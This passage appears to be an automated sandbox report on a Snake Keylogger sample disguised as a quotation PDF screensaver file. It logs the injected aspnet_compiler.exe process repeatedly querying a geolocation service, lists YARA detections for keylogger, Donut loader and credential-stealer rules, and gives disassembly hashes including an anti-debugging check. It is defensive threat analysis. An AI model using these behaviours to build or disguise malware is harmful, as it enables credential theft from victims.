                                                              Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                              Accept-Ranges: bytes
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2I%2FW%2B%2Fgif9r44zRBWt%2Fz%2BkeAtyKmUJbjymvhFABxd8lofH%2BSICHR5hzB%2FKCPRS201sHgRNccs3VFGMoSsCj%2Fti4nAdW%2FIm4ugmfiTLHWl7Lveq5vXxcO%2FwzjUQsAQQlv7EZSRt2F"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8e56ab7909db42f8-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1629&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=698&delivery_rate=1821584&cwnd=227&unsent_bytes=0&cid=cd8562c27dc3fd79&ts=136&x=0"
                                                              2024-11-20 07:19:06 UTC | 361 | IN | Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              7 | 192.168.2.4 | 49770 | 188.114.97.3 | 443 | 7792 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              2024-11-20 07:19:07 UTC | 84 | OUT | GET /xml/8.46.123.75 HTTP/1.1
                                                              Host: reallyfreegeoip.org
                                                              Connection: Keep-Alive
                                                              2024-11-20 07:19:07 UTC | 860 | IN | HTTP/1.1 200 OK
                                                              Date: Wed, 20 Nov 2024 07:19:07 GMT
                                                              Content-Type: text/xml
                                                              Content-Length: 361
                                                              Connection: close
                                                              Cache-Control: max-age=31536000
                                                              CF-Cache-Status: HIT
                                                              Age: 51056
                                                              Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                              Accept-Ranges: bytes
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FAhgrQfxhTXnTdgHxb3icuqgS4czhMrLvTgE3l2C7lx%2BRzwFI%2BTi%2BEZyuGQVJuhsSu9la72ndwyGdw1qotsuEJPrsYcV0rZ41swI%2BMM%2BlMQm2vr5KZ62BhaxGqqCJZSwbm%2FNl%2FM9"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8e56ab81289f32fc-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1993&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1454907&cwnd=240&unsent_bytes=0&cid=1b085f7eca3054dc&ts=153&x=0"
                                                              2024-11-20 07:19:07 UTC | 361 | IN | Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              8 | 192.168.2.4 | 49780 | 188.114.97.3 | 443 | 7792 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              2024-11-20 07:19:09 UTC | 84 | OUT | GET /xml/8.46.123.75 HTTP/1.1
                                                              Host: reallyfreegeoip.org
                                                              Connection: Keep-Alive
                                                              2024-11-20 07:19:09 UTC | 852 | IN | HTTP/1.1 200 OK
                                                              Date: Wed, 20 Nov 2024 07:19:09 GMT
                                                              Content-Type: text/xml
                                                              Content-Length: 361
                                                              Connection: close
                                                              Cache-Control: max-age=31536000
                                                              CF-Cache-Status: HIT
                                                              Age: 51058
                                                              Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                              Accept-Ranges: bytes
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rAithFowAVojQ%2FXfFY4SeNqKXYkZE9yismJlhhstcDZXwrXQ9cr5%2FLm%2Fy1AjNhOxbIgKhBObD7AP2lroSBzEqs9ti7kYIBJm%2FyREFPYFoU50fgCFNBtNOXDPTV4dmetG0OrXjzLi"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8e56ab89aa91728a-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2018&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=698&delivery_rate=1452013&cwnd=221&unsent_bytes=0&cid=bc85a5c206559d20&ts=261&x=0"
                                                              2024-11-20 07:19:09 UTC | 361 | IN | Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              9 | 192.168.2.4 | 49787 | 188.114.97.3 | 443 | 7792 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              2024-11-20 07:19:10 UTC | 84 | OUT | GET /xml/8.46.123.75 HTTP/1.1
                                                              Host: reallyfreegeoip.org
                                                              Connection: Keep-Alive
                                                              2024-11-20 07:19:10 UTC | 858 | IN | HTTP/1.1 200 OK
                                                              Date: Wed, 20 Nov 2024 07:19:10 GMT
                                                              Content-Type: text/xml
                                                              Content-Length: 361
                                                              Connection: close
                                                              Cache-Control: max-age=31536000
                                                              CF-Cache-Status: HIT
                                                              Age: 51059
                                                              Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                              Accept-Ranges: bytes
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JnOyYbo%2FnNNEbriDvWNrMj7WzMB0QT9C958TIdjJ5eZBPMcqSMD2%2BRye%2BUMWAp8XfmOhLXQb%2B%2BVP5LcZACck8XTZ9%2FzPmL0vN1MK8RuJkAEy5RKuyILlRNIQy8qcaWon7WF%2FUCg2"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8e56ab921c446a5e-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1561&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=698&delivery_rate=1803582&cwnd=198&unsent_bytes=0&cid=9f22c970522515ed&ts=154&x=0"
                                                              2024-11-20 07:19:10 UTC | 361 | IN | Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                              Target ID:0
                                                              Start time:02:18:08
                                                              Start date:20/11/2024
                                                              Path:C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe"
                                                              Imagebase:0x228e4e30000
                                                              File size:339'456 bytes
                                                              MD5 hash:5287698C5838C217C8330670920D1F22
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2214752450.0000022880090000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.2215561209.00000228E70FA000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2215561209.00000228E6D71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2222200198.00000228F6D46000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.2222200198.00000228F6D46000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                              Reputation:low
                                                              Has exited:true

                                                              Target ID:4
                                                              Start time:02:18:57
                                                              Start date:20/11/2024
                                                              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe"
                                                              Imagebase:0x1904ee40000
                                                              File size:55'824 bytes
                                                              MD5 hash:DF5419B32657D2896514B6A1D041FE08
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000004.00000002.2961287104.0000019050ECE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000004.00000002.2959415202.000001904EEC0000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000004.00000002.2963455838.0000019060C89000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000004.00000002.2963455838.0000019060C89000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000004.00000002.2963455838.0000019060C89000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000004.00000002.2960594780.0000019050AE0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000004.00000002.2960594780.0000019050AE0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                              • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000004.00000002.2960594780.0000019050AE0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                              • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000004.00000002.2960594780.0000019050AE0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                              • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000004.00000002.2960594780.0000019050AE0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000004.00000002.2961287104.0000019050C81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              Reputation:moderate
                                                              Has exited:false

                                                              Target ID:5
                                                              Start time:02:18:57
                                                              Start date:20/11/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff7699e0000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:false

                                                                Execution Graph

                                                                Execution Coverage:6.6%
                                                                Dynamic/Decrypted Code Coverage:0%
                                                                Signature Coverage:100%
                                                                Total number of Nodes:3
                                                                Total number of Limit Nodes:0
                                                                execution_graph 38850 7ffd9bab1535 38851 7ffd9bab154f CheckRemoteDebuggerPresent 38850->38851 38853 7ffd9bab15f3 38851->38853
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2228773050.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ffd9ba90000_QUOTATION_NOVQTRA071244PDF.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d045936d39f8edcae86dd0580f3858faa69dc3afabd965f13d1f83f6f7516908
                                                                • Instruction ID: d45fd80355ffa5fc34bba7a88eeff750e5d14ac4594b3fc041ca2f00a786072f
                                                                • Opcode Fuzzy Hash: d045936d39f8edcae86dd0580f3858faa69dc3afabd965f13d1f83f6f7516908
                                                                • Instruction Fuzzy Hash: 8DE2B230A09A4D8FDBA9DF68C490BA97BF1FF59740F1541AAD44DC72A6CA34ED81CB40

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 981 7ffd9bab1535-7ffd9bab15f1 CheckRemoteDebuggerPresent 986 7ffd9bab15f9-7ffd9bab163d 981->986 987 7ffd9bab15f3 981->987 987->986
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2228773050.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ffd9ba90000_QUOTATION_NOVQTRA071244PDF.jbxd
                                                                Similarity
                                                                • API ID: CheckDebuggerPresentRemote
                                                                • String ID:
                                                                • API String ID: 3662101638-0
                                                                • Opcode ID: 3adcd4792af3f1b6991096aab95db102bad4a30b250b50c4db58aed7d00b5e41
                                                                • Instruction ID: f8ed22a18b93e87700de07a9c437509e47b144ce644c6cf3cb626a13e0561590
                                                                • Opcode Fuzzy Hash: 3adcd4792af3f1b6991096aab95db102bad4a30b250b50c4db58aed7d00b5e41
                                                                • Instruction Fuzzy Hash: 2231F43190CB588FDB289F9898596FD7BE1EF95311F04426FE09AD3292DB34A4468781
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2228773050.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ffd9ba90000_QUOTATION_NOVQTRA071244PDF.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 715293b6b2cc462302958193ad8708d47c7c073def624cd21f695bbb9adf3496
                                                                • Instruction ID: fc359762ff9380d215bed0e23746bc48a8bc798cdd850da378338630995b1dfa
                                                                • Opcode Fuzzy Hash: 715293b6b2cc462302958193ad8708d47c7c073def624cd21f695bbb9adf3496
                                                                • Instruction Fuzzy Hash: 61822630B09A4E4FE7799BA888742B977D2FF94310F15067ED04EC72E2DE68E9428754

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2228773050.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ffd9ba90000_QUOTATION_NOVQTRA071244PDF.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 3a22f6fb70d7797e20898338c0b5390702f6acffb79527020a532bc075e9d769
                                                                • Instruction ID: 8b1f50183b400b728b8f71ce274d10ca129d2c0f5af787aab620864d55379dfd
                                                                • Opcode Fuzzy Hash: 3a22f6fb70d7797e20898338c0b5390702f6acffb79527020a532bc075e9d769
                                                                • Instruction Fuzzy Hash: 38520F30B19A4E4FEBA8DB688465A75B3E1FF98350F40017ED44EC32A6DF64BC428781

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2228773050.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ffd9ba90000_QUOTATION_NOVQTRA071244PDF.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ab1cb38d0441553868af68c3de3de84a9d8776dfb4891623c9ef31828e7ef992
                                                                • Instruction ID: 29fb1d8ec5db5367c0bd3690ae912b0bff172fe71fae6063a866de75c1d656d8
                                                                • Opcode Fuzzy Hash: ab1cb38d0441553868af68c3de3de84a9d8776dfb4891623c9ef31828e7ef992
                                                                • Instruction Fuzzy Hash: DC429F30719A0D4FEBA8EB2CC869A7977D1FF59300F1640BAE44EC72A6DE64EC418741

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2228773050.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ffd9ba90000_QUOTATION_NOVQTRA071244PDF.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: acab0b174db937bf27127580caa3ef812889cc1a7b58f8e25705ccf8c4eb4ce0
                                                                • Instruction ID: cc81f7fc0942f357064652caa563b50ab853bf0e462832d1c8a3b28e9c344581
                                                                • Opcode Fuzzy Hash: acab0b174db937bf27127580caa3ef812889cc1a7b58f8e25705ccf8c4eb4ce0
                                                                • Instruction Fuzzy Hash: 5E42FE30B1DB498FE768EB68C45597577E1FFA5300F1105BEE48AC32A6DA74E842C781
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2228773050.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ffd9ba90000_QUOTATION_NOVQTRA071244PDF.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 8961931dc38794b1e075561581512427874d33d038dc1b4c046425fc6c0a9172
                                                                • Instruction ID: 73a00bddffda60db81877f9d3ab31b06a60fa3cda44b9a4e8f8dd315ec7244bb
                                                                • Opcode Fuzzy Hash: 8961931dc38794b1e075561581512427874d33d038dc1b4c046425fc6c0a9172
                                                                • Instruction Fuzzy Hash: 29F1D530A09A8D8FEBA8DF68CC657E937D1FF58310F04426EE85DC7295DB74A9418B81
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2228773050.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ffd9ba90000_QUOTATION_NOVQTRA071244PDF.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 723cdee5d2db78d92181b563ef5de21a1063b78364e082a7d1ca57e7bb9be636
                                                                • Instruction ID: 1cf6d44479ad8ad365c60c6310808a82ad2d6283bd651b7739d663a408766a5a
                                                                • Opcode Fuzzy Hash: 723cdee5d2db78d92181b563ef5de21a1063b78364e082a7d1ca57e7bb9be636
                                                                • Instruction Fuzzy Hash: 24E1D430A09A4D8FEBA8DF28C8657E977D1FF54310F04426ED85DC72A5DE74E9818B81

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2227770196.00007FFD9B9D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9D0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ffd9b9d0000_QUOTATION_NOVQTRA071244PDF.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 9_H
                                                                • API String ID: 0-1170298704
                                                                • Opcode ID: 1d84de51f808d9a867e199cb7bf67df7f1c93e208a96c3a7d4bec5a5d8b5759d
                                                                • Instruction ID: e821549b92766e662411a1196cda3cb85c9ae703dfe31087031317780253af30
                                                                • Opcode Fuzzy Hash: 1d84de51f808d9a867e199cb7bf67df7f1c93e208a96c3a7d4bec5a5d8b5759d
                                                                • Instruction Fuzzy Hash: 5E02FC30E1A61D9FEBA4DFA9C4A57BC77B2FF59301F510179E40D922A1CB396981CB40

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 989 7ffd9b89c037-7ffd9b89c053 990 7ffd9b89c056-7ffd9b89c099 989->990 991 7ffd9b89c055 989->991 993 7ffd9b89c09b 990->993 994 7ffd9b89c0a0-7ffd9b89c0ac call 7ffd9b8948e8 990->994 991->990 993->994 996 7ffd9b89c0b1-7ffd9b89c2b6 994->996 1020 7ffd9b89c2b8-7ffd9b89c318 996->1020 1021 7ffd9b89c31a-7ffd9b89c3ea 996->1021 1020->1021
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2226753444.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ffd9b890000_QUOTATION_NOVQTRA071244PDF.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: _
                                                                • API String ID: 0-701932520
                                                                • Opcode ID: f45f289979de127f2f4e3ec0a69f1fd002f34412f70678acb99ee7127950929c
                                                                • Instruction ID: cdb555fd875763e907d220ad5e96e6ad98072a425dfe601cfa27f4f17a2928eb
                                                                • Opcode Fuzzy Hash: f45f289979de127f2f4e3ec0a69f1fd002f34412f70678acb99ee7127950929c
                                                                • Instruction Fuzzy Hash: FEC1A16190ABC94FE756DBB898287A87FF1EF5A340F0400EBD488CB2E7DA381945C751
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 20b37a72208edfb918a4c88e3cca1c2309b541c3bdef6d5b883a646fac9f2ce7
                                                                • Instruction ID: 73264a1654b77d22d76cb953aa51243198c0be9736a064674c7a2ffd45bfe68b
                                                                • Opcode Fuzzy Hash: 20b37a72208edfb918a4c88e3cca1c2309b541c3bdef6d5b883a646fac9f2ce7
                                                                • Instruction Fuzzy Hash: 8031E831B0995E8FDB59EFA8D4606FE7BB1EF89300F1401BAD05DE7196CA346A41C790
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2226753444.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ffd9b890000_QUOTATION_NOVQTRA071244PDF.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 8c2a3a04b67ffc7fa7f7c672b8822120f0ebbc682316566548cb23b5576d1d1c
                                                                • Instruction ID: bbca3511105eb94dbb58bb0cc32d006b9a5e06583012368484431e6599cc4daf
                                                                • Opcode Fuzzy Hash: 8c2a3a04b67ffc7fa7f7c672b8822120f0ebbc682316566548cb23b5576d1d1c
                                                                • Instruction Fuzzy Hash: 3231AF71A19A4D8FDB99EB6CC4646A87BF0FF59300F0500EAE08DD72A2DA34A9458B40
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2226753444.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ffd9b890000_QUOTATION_NOVQTRA071244PDF.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 9db7e065f5cafa7faa71f535c08fefde3099c6c3699850dec44a12c294d22535
                                                                • Instruction ID: de4764036cf4cf468d1ed404b4050623f6f84e40710b5b68fa6dccaa1b9de296
                                                                • Opcode Fuzzy Hash: 9db7e065f5cafa7faa71f535c08fefde3099c6c3699850dec44a12c294d22535
                                                                • Instruction Fuzzy Hash: 4A31D43260965D8FC706EF6CE8A69E97BB0EF46319B0802E3E049C71A3DA24A545C781
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2227770196.00007FFD9B9D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9D0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ffd9b9d0000_QUOTATION_NOVQTRA071244PDF.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d9e2c2539c254273f81356dfa2a8e67296c8c796baba76301cac80b8f6a74004
                                                                • Instruction ID: f878c30eee2c84dba4f823e7b224aaac4a38455af0b143d41d2a4f50fe3d94a3
                                                                • Opcode Fuzzy Hash: d9e2c2539c254273f81356dfa2a8e67296c8c796baba76301cac80b8f6a74004
                                                                • Instruction Fuzzy Hash: FD315E70E1991E9FEFA4DF98C8956ADBBB1FF98301F50417AD40CE3261DB3469818B90
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2226753444.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ffd9b890000_QUOTATION_NOVQTRA071244PDF.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5d371da06001b9509cbbb9b6c8cd30f38ebaa172c2fc31783b9977c7cddd4a86
                                                                • Instruction ID: 5d0008979be860749b89696ed5025b1b13d87c7530337763a7ce9bf4f3c6ca74
                                                                • Opcode Fuzzy Hash: 5d371da06001b9509cbbb9b6c8cd30f38ebaa172c2fc31783b9977c7cddd4a86
                                                                • Instruction Fuzzy Hash: C721F635A0868E8FDF54EF68C8545EB7BB2FF99300F00417AE818C7295DA35A941C781
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2226753444.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ffd9b890000_QUOTATION_NOVQTRA071244PDF.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 0de417044c01fc652340d712f26810ca06172913fc547b73e30da03867d4c487
                                                                • Instruction ID: 5f44e0befc7d8d2097abc52a98eb77acd6f04c2ea9c9df6f16fe51c470ae6b23
                                                                • Opcode Fuzzy Hash: 0de417044c01fc652340d712f26810ca06172913fc547b73e30da03867d4c487
                                                                • Instruction Fuzzy Hash: 29218B32A0961DCFDF15EF9CD8695E93BA0FF18319F4402B6D01CC7192EE29A242C781
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2226753444.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ffd9b890000_QUOTATION_NOVQTRA071244PDF.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ce217c21353faadcddab8869c2a60cdafc81e6700103573fbf2a5716a0ee278d
                                                                • Instruction ID: 78fe69472a48d3d5e7adc3619fba0a00e699cd6c049a9f4532d8346bda5bd769
                                                                • Opcode Fuzzy Hash: ce217c21353faadcddab8869c2a60cdafc81e6700103573fbf2a5716a0ee278d
                                                                • Instruction Fuzzy Hash: DD212830A0968E8FDF85DF64C8556E77FF2FF99300F1441AAE819C7295CA34A942C780
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2226753444.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ffd9b890000_QUOTATION_NOVQTRA071244PDF.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: bed3d21b2305b8a34600f3de3744ea7c20bff733ea3a3f7ace2c665d8bedf002
                                                                • Instruction ID: ff3bee7c7806f2d14fbb79c50792099e5a83359799a61c9f721c5e66e67c4775
                                                                • Opcode Fuzzy Hash: bed3d21b2305b8a34600f3de3744ea7c20bff733ea3a3f7ace2c665d8bedf002
                                                                • Instruction Fuzzy Hash: E7210371A0A61DDFDB55EF98C8A59ED37F0FF14308B0402A2D428DB1A2FE35A651CB90
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2226753444.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ffd9b890000_QUOTATION_NOVQTRA071244PDF.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
